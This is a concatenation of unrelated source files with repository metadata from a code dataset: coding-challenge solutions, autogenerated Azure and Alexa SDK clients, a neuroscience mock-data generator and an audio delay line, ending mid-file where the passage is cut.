result = get_result(_data, final_data) # save_as_file(result, "../Data/result.json")
b5956f1a4f170c496cdc206d745f9cb2a1b5f2c9
10b74a5b6e678e51853611645f7898d2d28eccf8
/player117.py
50a13f63fd40e20f130faa5e2c303af0c1080256
[]
no_license
tigervanilla/Guvi
a31ce1838707c71976a23fd5b25f5ebd9e0656ef
f9363f46f23d8a9b17a14f3d83322f59944a444b
refs/heads/master
2020-04-01T02:44:43.767502
2019-04-18T04:58:40
2019-04-18T04:58:40
152,793,355
2
0
null
null
null
null
UTF-8
Python
false
false
78
py
a=input() a=a[::-1] print(a[0],end='') for i in a[1:]: print('-'+i,end='')
c380425895250438ccfe619d806e2cc74a449d63
f63dc9959bbd596c04f70f671f9b0cbc70adb552
/env/lib/python3.6/_bootlocale.py
7d49875e50ddc0d5b5d4af50922354e7dda4ee93
[]
no_license
paulfranco/imd_api
efa4e5d5399fea191f215d2a8d907adfb55ab31a
1889290b5596fd1a020c336cc7c28d8521785a15
refs/heads/master
2020-03-16T06:30:31.077649
2018-05-09T02:10:03
2018-05-09T02:10:03
132,556,482
0
0
null
null
null
null
UTF-8
Python
false
false
56
py
/Users/paulfranco/anaconda3/lib/python3.6/_bootlocale.py
c7f5f003abb3040b1524784d99a06585be3ae3cc
5afd733a5c1f753601c69b8b4eae1b49edfbae7c
/1-100/26.py
fa36e700d0e1f5ab060ef83dfb14183c587f6ef8
[]
no_license
yanbinbi/leetcode
9dcd4a0160be915006455b83d6b7cd39e9819811
616a868bfa7bdd00195067b0477b0236a72d23e0
refs/heads/master
2021-05-13T19:34:17.222576
2017-11-12T02:04:31
2017-11-12T02:04:31
null
0
0
null
null
null
null
UTF-8
Python
false
false
391
py
class Solution(object): def removeDuplicates(self, nums): """ :type nums: List[int] :rtype: int """ size = len(nums) if size == 0: return 0 j = 0 for i in range(1,size): if nums[i] > nums[j]: j += 1 if i != j: nums[j] = nums[i] return j+1
aa034bd935af2335c3c1651436ae7001c1fde500
a4525c981552117dabdf5f952ced15997199da32
/ask-smapi-model/ask_smapi_model/v1/skill/interaction_model/model_type/slot_type_definition_output.py
5a60b84255908d1a8d2553d4ce4a24b9d61f9ea7
[ "Apache-2.0" ]
permissive
muskanmahajan37/alexa-apis-for-python
29b3b8e45bb009fa56ba0a2a73ed2f50efe77f65
8e0c90a3031f5afd8a2e62d19b51fe392e7da1af
refs/heads/master
2022-11-09T01:14:58.947495
2020-06-25T17:33:19
2020-06-25T17:33:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,919
py
# coding: utf-8 # # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file # except in compliance with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # the specific language governing permissions and limitations under the License. # import pprint import re # noqa: F401 import six import typing from enum import Enum if typing.TYPE_CHECKING: from typing import Dict, List, Optional, Union from datetime import datetime from ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input import SlotTypeInputV1 class SlotTypeDefinitionOutput(object): """ Slot Type request definitions. :param slot_type: :type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput :param total_versions: Total number of versions. :type total_versions: (optional) str """ deserialized_types = { 'slot_type': 'ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput', 'total_versions': 'str' } # type: Dict attribute_map = { 'slot_type': 'slotType', 'total_versions': 'totalVersions' } # type: Dict supports_multiple_types = False def __init__(self, slot_type=None, total_versions=None): # type: (Optional[SlotTypeInputV1], Optional[str]) -> None """Slot Type request definitions. :param slot_type: :type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput :param total_versions: Total number of versions. :type total_versions: (optional) str """ self.__discriminator_value = None # type: str self.slot_type = slot_type self.total_versions = total_versions def to_dict(self): # type: () -> Dict[str, object] """Returns the model properties as a dict""" result = {} # type: Dict for attr, _ in six.iteritems(self.deserialized_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x.value if isinstance(x, Enum) else x, value )) elif isinstance(value, Enum): result[attr] = value.value elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else (item[0], item[1].value) if isinstance(item[1], Enum) else item, value.items() )) else: result[attr] = value return result def to_str(self): # type: () -> str """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): # type: () -> str """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): # type: (object) -> bool """Returns true if both objects are equal""" if not isinstance(other, SlotTypeDefinitionOutput): return False return self.__dict__ == other.__dict__ def __ne__(self, other): # type: (object) -> bool """Returns true if both objects are not equal""" return not self == other
46b7f2b1be3242b3a9fd4117a6a4d2ec15eabc2a
7cb646a87705156e9d6e0b651df4c0a90a99947b
/phy/io/mock/kwik.py
eed05ce223d2cfe13a1c77dd59cf3e8a4654db4d
[]
no_license
cgestes/phy
1339b8ce46ac076129496745c23d87bfc73e6407
8bb7b9377e6376dce46ef123ccc97ecf3671fb15
refs/heads/master
2021-01-18T10:21:35.785483
2015-04-16T11:42:39
2015-04-16T13:51:57
30,656,835
0
0
null
null
null
null
UTF-8
Python
false
false
5,009
py
# -*- coding: utf-8 -*- """Mock Kwik files.""" #------------------------------------------------------------------------------ # Imports #------------------------------------------------------------------------------ import os.path as op import numpy as np from ...io.mock.artificial import (artificial_spike_samples, artificial_spike_clusters, artificial_features, artificial_masks, artificial_traces) from ...electrode.mea import staggered_positions from ..h5 import open_h5 from ..kwik_model import _kwik_filenames, _create_clustering #------------------------------------------------------------------------------ # Mock Kwik file #------------------------------------------------------------------------------ def create_mock_kwik(dir_path, n_clusters=None, n_spikes=None, n_channels=None, n_features_per_channel=None, n_samples_traces=None, with_kwx=True, with_kwd=True): """Create a test kwik file.""" filename = op.join(dir_path, '_test.kwik') filenames = _kwik_filenames(filename) kwx_filename = filenames['kwx'] kwd_filename = filenames['raw.kwd'] # Create the kwik file. with open_h5(filename, 'w') as f: f.write_attr('/', 'kwik_version', 2) def _write_metadata(key, value): f.write_attr('/application_data/spikedetekt', key, value) _write_metadata('sample_rate', 20000.) # Filter parameters. _write_metadata('filter_low', 500.) _write_metadata('filter_high', 0.95 * .5 * 20000.) _write_metadata('filter_butter_order', 3) _write_metadata('extract_s_before', 15) _write_metadata('extract_s_after', 25) _write_metadata('nfeatures_per_channel', n_features_per_channel) # Create spike times. spike_samples = artificial_spike_samples(n_spikes).astype(np.int64) spike_recordings = np.zeros(n_spikes, dtype=np.uint16) # Size of the first recording. recording_size = 2 * n_spikes // 3 # Find the recording offset. recording_offset = spike_samples[recording_size] recording_offset += spike_samples[recording_size + 1] recording_offset //= 2 spike_recordings[recording_size:] = 1 # Make sure the spike samples of the second recording start over. spike_samples[recording_size:] -= spike_samples[recording_size] spike_samples[recording_size:] += 10 if spike_samples.max() >= n_samples_traces: raise ValueError("There are too many spikes: decrease 'n_spikes'.") f.write('/channel_groups/1/spikes/time_samples', spike_samples) f.write('/channel_groups/1/spikes/recording', spike_recordings) f.write_attr('/channel_groups/1', 'channel_order', np.arange(1, n_channels - 1)[::-1], ) # Create channels. positions = staggered_positions(n_channels) for channel in range(n_channels): group = '/channel_groups/1/channels/{0:d}'.format(channel) f.write_attr(group, 'name', str(channel)) f.write_attr(group, 'position', positions[channel]) # Create spike clusters. clusterings = [('main', n_clusters), ('automatic', n_clusters * 2), ] for clustering, n_clusters_rec in clusterings: spike_clusters = artificial_spike_clusters(n_spikes, n_clusters_rec) _create_clustering(f, clustering, 1, spike_clusters) # Create recordings. f.write_attr('/recordings/0', 'name', 'recording_0') f.write_attr('/recordings/1', 'name', 'recording_1') # Create the kwx file. if with_kwx: with open_h5(kwx_filename, 'w') as f: f.write_attr('/', 'kwik_version', 2) features = artificial_features(n_spikes, (n_channels - 2) * n_features_per_channel) masks = artificial_masks(n_spikes, (n_channels - 2) * n_features_per_channel) fm = np.dstack((features, masks)).astype(np.float32) f.write('/channel_groups/1/features_masks', fm) # Create the raw kwd file. if with_kwd: with open_h5(kwd_filename, 'w') as f: f.write_attr('/', 'kwik_version', 2) traces = artificial_traces(n_samples_traces, n_channels) # TODO: int16 traces f.write('/recordings/0/data', traces[:recording_offset, ...].astype(np.float32)) f.write('/recordings/1/data', traces[recording_offset:, ...].astype(np.float32)) return filename
c72670766922c59f54f1e38c3251a93c3d29440e
8ed4bf9fbead471c9e5f88e4d18ac432ec3d628b
/hackerrank/algorithm/string/reduced_string.py
0fec6e1adc81c9b8b46f35b176b59a2b2e96024b
[]
no_license
hizbul25/programming_problem
9bf26e49ed5bb8c9c829d00e765c9401222fb35c
2acca363704b993ffe5f6c2b00f81a4f4eca7204
refs/heads/master
2021-01-10T22:28:26.105787
2018-01-21T16:45:45
2018-01-21T16:45:45
65,394,734
1
0
null
null
null
null
UTF-8
Python
false
false
270
py
# URL: https://www.hackerrank.com/challenges/reduced-string s = input() stack = [] for i in range(len(s)): if not stack or s[i] != stack[-1]: stack += [s[i]] else: stack.pop() if stack: print(''.join(stack)) else: print('Empty String')
c2f63be45f8a4ef6445fb0981f9ae21611bb6d46
82b946da326148a3c1c1f687f96c0da165bb2c15
/sdk/python/pulumi_azure_native/web/v20181101/get_web_app_swift_virtual_network_connection_slot.py
5279f9e04c7689c8359817ea2659e83821fa878c
[ "BSD-3-Clause", "Apache-2.0" ]
permissive
morrell/pulumi-azure-native
3916e978382366607f3df0a669f24cb16293ff5e
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
refs/heads/master
2023-06-20T19:37:05.414924
2021-07-19T20:57:53
2021-07-19T20:57:53
387,815,163
0
0
Apache-2.0
2021-07-20T14:18:29
2021-07-20T14:18:28
null
UTF-8
Python
false
false
5,220
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities __all__ = [ 'GetWebAppSwiftVirtualNetworkConnectionSlotResult', 'AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult', 'get_web_app_swift_virtual_network_connection_slot', ] @pulumi.output_type class GetWebAppSwiftVirtualNetworkConnectionSlotResult: """ Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration. """ def __init__(__self__, id=None, kind=None, name=None, subnet_resource_id=None, swift_supported=None, type=None): if id and not isinstance(id, str): raise TypeError("Expected argument 'id' to be a str") pulumi.set(__self__, "id", id) if kind and not isinstance(kind, str): raise TypeError("Expected argument 'kind' to be a str") pulumi.set(__self__, "kind", kind) if name and not isinstance(name, str): raise TypeError("Expected argument 'name' to be a str") pulumi.set(__self__, "name", name) if subnet_resource_id and not isinstance(subnet_resource_id, str): raise TypeError("Expected argument 'subnet_resource_id' to be a str") pulumi.set(__self__, "subnet_resource_id", subnet_resource_id) if swift_supported and not isinstance(swift_supported, bool): raise TypeError("Expected argument 'swift_supported' to be a bool") pulumi.set(__self__, "swift_supported", swift_supported) if type and not isinstance(type, str): raise TypeError("Expected argument 'type' to be a str") pulumi.set(__self__, "type", type) @property @pulumi.getter def id(self) -> str: """ Resource Id. """ return pulumi.get(self, "id") @property @pulumi.getter def kind(self) -> Optional[str]: """ Kind of resource. """ return pulumi.get(self, "kind") @property @pulumi.getter def name(self) -> str: """ Resource Name. """ return pulumi.get(self, "name") @property @pulumi.getter(name="subnetResourceId") def subnet_resource_id(self) -> Optional[str]: """ The Virtual Network subnet's resource ID. This is the subnet that this Web App will join. This subnet must have a delegation to Microsoft.Web/serverFarms defined first. """ return pulumi.get(self, "subnet_resource_id") @property @pulumi.getter(name="swiftSupported") def swift_supported(self) -> Optional[bool]: """ A flag that specifies if the scale unit this Web App is on supports Swift integration. """ return pulumi.get(self, "swift_supported") @property @pulumi.getter def type(self) -> str: """ Resource type. """ return pulumi.get(self, "type") class AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(GetWebAppSwiftVirtualNetworkConnectionSlotResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetWebAppSwiftVirtualNetworkConnectionSlotResult( id=self.id, kind=self.kind, name=self.name, subnet_resource_id=self.subnet_resource_id, swift_supported=self.swift_supported, type=self.type) def get_web_app_swift_virtual_network_connection_slot(name: Optional[str] = None, resource_group_name: Optional[str] = None, slot: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult: """ Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration. :param str name: Name of the app. :param str resource_group_name: Name of the resource group to which the resource belongs. :param str slot: Name of the deployment slot. If a slot is not specified, the API will get a gateway for the production slot's Virtual Network. """ __args__ = dict() __args__['name'] = name __args__['resourceGroupName'] = resource_group_name __args__['slot'] = slot if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-native:web/v20181101:getWebAppSwiftVirtualNetworkConnectionSlot', __args__, opts=opts, typ=GetWebAppSwiftVirtualNetworkConnectionSlotResult).value return AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult( id=__ret__.id, kind=__ret__.kind, name=__ret__.name, subnet_resource_id=__ret__.subnet_resource_id, swift_supported=__ret__.swift_supported, type=__ret__.type)
e2daa17da7418fb80cec9ab0745d804c304546ab
fee71dd79c16f8e4aa4be46aa25863a3e8539a51
/ear/core/delay.py
58999508e96ec84140b7be0b2066bb0c4deb9373
[ "BSD-3-Clause-Clear" ]
permissive
ebu/ebu_adm_renderer
d004ed857b3004c9de336426f402654779a0eaf8
ef2189021203101eab323e1eccdd2527b32a5024
refs/heads/master
2023-08-09T09:13:06.626698
2022-12-07T12:22:39
2022-12-07T12:22:39
123,921,945
61
13
BSD-3-Clause-Clear
2023-08-30T17:17:05
2018-03-05T13:15:36
Python
UTF-8
Python
false
false
1,676
py
import numpy as np class Delay(object): """Multi-channel delay line. Parameters: nchannels (int): number of channels to process delay (int): number of samples to delay by """ def __init__(self, nchannels, delay): assert delay >= 0 self.delaymem = np.zeros((delay, nchannels)) self.delay = delay def process(self, input_samples): """Push n samples through the delay line. Parameters: input_samples (array of nsamples by nchannels): input samples Returns: array of nsamples by nchannels: output samples, delayed by delay samples. """ output = np.zeros_like(input_samples) # transfer samples from the delay memory followed by the input, to the # output followed by the new delay memory, such that concat(src) before # the transfer has the same value as concat(dst) after src = [self.delaymem, input_samples] dst = [output, self.delaymem] # copy the common part of src[0] and dst[0] start_len = min(len(src[0]), len(dst[0])) if start_len: dst[0][:start_len] = src[0][:start_len] # copy the part where src[0] overlaps dst[1] or src[1] overlaps dst[0] overlap = len(src[0]) - len(dst[0]) if overlap > 0: # src[0] longer dst[1][:overlap] = src[0][-overlap:] elif overlap < 0: # dst[0] longer dst[0][overlap:] = src[1][:-overlap] # copy the common part of src[1] and dst[1] end_len = min(len(src[1]), len(dst[1])) if end_len: dst[1][-end_len:] = src[1][-end_len:] return output
42803d5018e53b70b319b1d8fc3cfa2d380118f7
b8d2f095a4b7ea567ccc61ee318ba879318eec3d
/数组 Array/228. 汇总区间.py
2459ae5ea8ae5dd79af2263fa4cdbfdda2c61f89
[]
no_license
f1amingo/leetcode-python
a3ef78727ae696fe2e94896258cfba1b7d58b1e3
b365ba85036e51f7a9e018767914ef22314a6780
refs/heads/master
2021-11-10T16:19:27.603342
2021-09-17T03:12:59
2021-09-17T03:12:59
205,813,698
1
0
null
null
null
null
UTF-8
Python
false
false
971
py
from typing import List class Solution: def summaryRanges(self, nums: List[int]) -> List[str]: if not nums: return [] ans = [] lt, rt = nums[0], None for i in range(len(nums) - 1): if nums[i + 1] - nums[i] == 1: # if t is None 和 if not t 并不等价 if lt is None: lt = nums[i] rt = nums[i + 1] else: ans.append(str(lt) + '->' + str(rt) if rt else str(lt)) lt, rt = nums[i + 1], None ans.append(str(lt) + '->' + str(rt) if rt else str(lt)) return ans assert Solution().summaryRanges([0]) == ['0'] assert Solution().summaryRanges([0, 1, 2, 4, 5, 7]) == ["0->2", "4->5", "7"] assert Solution().summaryRanges([0, 2, 3, 4, 6, 8, 9]) == ["0", "2->4", "6", "8->9"] assert Solution().summaryRanges([]) == [] assert Solution().summaryRanges([-1]) == ['-1']
2ec9d717282626becf58a398a994ec197e90f564
55c250525bd7198ac905b1f2f86d16a44f73e03a
/Python/Kivy/python-for-android/pythonforandroid/recipes/ffpyplayer_codecs/__init__.py
599d8d30207ce572fac347c18e6677d753b80e58
[ "MIT" ]
permissive
NateWeiler/Resources
213d18ba86f7cc9d845741b8571b9e2c2c6be916
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
refs/heads/master
2023-09-03T17:50:31.937137
2023-08-28T23:50:57
2023-08-28T23:50:57
267,368,545
2
1
null
2022-09-08T15:20:18
2020-05-27T16:18:17
null
UTF-8
Python
false
false
128
py
version https://git-lfs.github.com/spec/v1 oid sha256:d196a4f300350342824820ae06ebac62968d8b22ad0fd350043b298a302af005 size 206
235d72234d9d44c9e16f8a005e6726574387a789
a689a72d3699883d7b58bd4ee3103373270bd0d5
/BOJ/Python/BOJ17135.py
5ecf7f7b4bd365d3f602a3d3ca99da2cd2830899
[]
no_license
Oizys18/Algo
4670748c850dc9472b6cfb9f828a3ccad9c18981
45caafe22a8a8c9134e4ff3b227f5f0be94eefe7
refs/heads/master
2022-05-11T08:35:06.812539
2022-05-07T01:30:41
2022-05-07T01:30:41
202,690,024
4
1
null
null
null
null
UTF-8
Python
false
false
1,722
py
# 캐슬 디펜스 from pprint import pprint as pp import collections import itertools import copy N, M, D = map(int, input().split()) mat = [[*map(int, input().split())] for _ in range(N)] + [[0]*M] archers = [0]*M def isMap(x, y): if 0 <= x < N + 2 and 0 <= y < M: return True else: return False def BFS(field, x, y): visit = [[0]*M for _ in range(N+1)] queue = [] queue.append((0, x, y)) while queue: depth, x, y = queue.pop(0) if depth > D: continue if not visit[x][y]: visit[x][y] = 1 if field[x][y] == 1: return (x, y) for dx, dy in [(0, -1), (-1, 0), (0, 1)]: nx = x + dx ny = y + dy if isMap(nx, ny): queue.append((depth+1, nx, ny)) def fight(): kills = 0 field = collections.deque(copy.deepcopy(mat)) while True: turnKill = set() for x in range(N + 1): for y in range(M): if field[x][y] == 2: killed = BFS(field, x, y) if killed: turnKill.add(killed) for xt, yt in turnKill: field[xt][yt] = 0 kills += 1 field.extendleft([[0]*M]) del field[N] flag = 0 for a in range(N): for b in range(M): if field[a][b]: flag = 1 if not flag: return kills res = 0 for chosen_archer in itertools.combinations(range(M), 3): for ca in chosen_archer: mat[N][ca] = 2 tactics = fight() if res < tactics: res = tactics mat[N] = [0]*M print(res)
6b6946656fd1304aae15c78dde3c42a745ede7da
f576f0ea3725d54bd2551883901b25b863fe6688
/sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2021_10_01_dataplanepreview/operations/_model_versions_operations.py
96a47546ef9a6da776ce57b212c87f20db9d6679
[ "LicenseRef-scancode-generic-cla", "LicenseRef-scancode-python-cwi", "LGPL-2.1-or-later", "PSF-2.0", "LGPL-2.0-or-later", "GPL-3.0-or-later", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "LGPL-2.1-only", "Python-2.0", "MPL-2.0", "LicenseRef-scancode-other-copyleft", "HPND", "ODbL-1.0", "GPL-3.0-only", "ZPL-2.1", "MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "LicenseRef-scancode-free-unknown" ]
permissive
Azure/azure-sdk-for-python
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
c2ca191e736bb06bfbbbc9493e8325763ba990bb
refs/heads/main
2023-09-06T09:30:13.135012
2023-09-06T01:08:06
2023-09-06T01:08:06
4,127,088
4,046
2,755
MIT
2023-09-14T21:48:49
2012-04-24T16:46:12
Python
UTF-8
Python
false
false
37,349
py
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import TYPE_CHECKING import warnings from azure.core.exceptions import ( ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error, ) from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.polling import LROPoller, NoPolling, PollingMethod from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.mgmt.core.exceptions import ARMErrorFormat from azure.mgmt.core.polling.arm_polling import ARMPolling from msrest import Serializer from .. import models as _models from .._vendor import _convert_request, _format_url_section if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union T = TypeVar("T") ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False # fmt: off def build_list_request( name, # type: str subscription_id, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> HttpRequest api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str skiptoken = kwargs.pop('skiptoken', None) # type: Optional[str] order_by = kwargs.pop('order_by', None) # type: Optional[str] top = kwargs.pop('top', None) # type: Optional[int] version = kwargs.pop('version', None) # type: Optional[str] description = kwargs.pop('description', None) # type: Optional[str] tags = kwargs.pop('tags', None) # type: Optional[str] properties = kwargs.pop('properties', None) # type: Optional[str] list_view_type = kwargs.pop('list_view_type', None) # type: Optional[Union[str, "_models.ListViewType"]] accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1), "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1), "registryName": _SERIALIZER.url("registry_name", registry_name, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') if skiptoken is not None: query_parameters['$skiptoken'] = _SERIALIZER.query("skiptoken", skiptoken, 'str') if order_by is not None: query_parameters['$orderBy'] = _SERIALIZER.query("order_by", order_by, 'str') if top is not None: query_parameters['$top'] = _SERIALIZER.query("top", top, 'int') if version is not None: query_parameters['version'] = _SERIALIZER.query("version", version, 'str') if description is not None: query_parameters['description'] = _SERIALIZER.query("description", description, 'str') if tags is not None: query_parameters['tags'] = _SERIALIZER.query("tags", tags, 'str') if properties is not None: query_parameters['properties'] = _SERIALIZER.query("properties", properties, 'str') if list_view_type is not None: query_parameters['listViewType'] = _SERIALIZER.query("list_view_type", list_view_type, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_delete_request( name, # type: str version, # type: str subscription_id, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> HttpRequest api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "version": _SERIALIZER.url("version", version, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1), "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1), "registryName": _SERIALIZER.url("registry_name", registry_name, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="DELETE", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_get_request( name, # type: str version, # type: str subscription_id, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> HttpRequest api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "version": _SERIALIZER.url("version", version, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1), "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1), "registryName": _SERIALIZER.url("registry_name", registry_name, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_create_or_update_request_initial( name, # type: str version, # type: str subscription_id, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> HttpRequest api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop('content_type', None) # type: Optional[str] accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str', pattern=r'^(?![\-_.])[a-zA-Z0-9\-_.]{1,255}(?<!\.)$'), "version": _SERIALIZER.url("version", version, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1), "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1), "registryName": _SERIALIZER.url("registry_name", registry_name, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] if content_type is not None: header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="PUT", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_package_request_initial( name, # type: str version, # type: str subscription_id, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> HttpRequest api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop('content_type', None) # type: Optional[str] accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str', pattern=r'^[a-zA-Z0-9][a-zA-Z0-9\-_]{0,254}$'), "version": _SERIALIZER.url("version", version, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1), "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1), "registryName": _SERIALIZER.url("registry_name", registry_name, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] if content_type is not None: header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="POST", url=url, params=query_parameters, headers=header_parameters, **kwargs ) # fmt: on class ModelVersionsOperations(object): """ModelVersionsOperations operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.machinelearningservices.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list( self, name, # type: str resource_group_name, # type: str registry_name, # type: str skiptoken=None, # type: Optional[str] order_by=None, # type: Optional[str] top=None, # type: Optional[int] version=None, # type: Optional[str] description=None, # type: Optional[str] tags=None, # type: Optional[str] properties=None, # type: Optional[str] list_view_type=None, # type: Optional[Union[str, "_models.ListViewType"]] **kwargs # type: Any ): # type: (...) -> Iterable["_models.ModelVersionResourceArmPaginatedResult"] """List versions. List versions. :param name: Container name. This is case-sensitive. :type 